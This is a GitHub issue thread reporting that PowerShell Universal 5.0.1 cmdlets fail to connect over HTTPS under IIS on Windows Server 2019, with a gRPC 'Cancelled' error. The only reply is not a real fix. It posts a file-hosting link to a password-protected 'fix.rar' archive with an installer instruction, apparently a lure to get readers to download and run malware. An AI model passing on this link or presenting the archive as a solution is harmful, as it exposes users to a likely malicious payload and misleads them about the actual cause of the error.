### ISSUE TITLE
Issue Connecting with cmdlets in Windows Server 2019 IIS

### ISSUE THREAD

**Issue by adamdriscoll** [ironmansoftware/powershell-universal#3657]
### Version

5.0.1

### Severity

Medium

### Environment

msi

### Steps to Reproduce

- IIS
- HTTPS 

```
Status(StatusCode="Cancelled", Detail="No grpc-status found on response. Using gRPC with WinHttp has Windows and package version requirements. See https://aka.ms/aspnet/grpc/netstandard for details.")
```

### Expected behavior

```console
Connects successfully.
```

### Actual behavior

```console
Does not connect.
```

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
